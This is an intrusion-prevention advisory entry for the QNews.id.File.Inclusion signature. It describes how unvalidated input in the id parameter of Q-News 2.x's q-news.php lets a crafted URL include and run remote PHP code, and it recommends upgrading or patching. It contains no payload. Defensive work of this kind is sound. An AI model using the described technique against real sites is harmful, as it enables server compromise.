Intrusion Prevention

QNews.id.File.Inclusion

Description

It indicates a possible exploit of file inclusion vulnerabilities in the Q-News PHP script that may allow an attacker to execute arbitrary OHO code on the vulnerable system. This is due to The q-news.php script failure to properly validate user-supplied input in the id parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Affected Products

Q-News 2.x

Impact

Compromise of the affected system.

Recommended Actions

Upgrade later than Q-News 2.x or apply appropriate patch.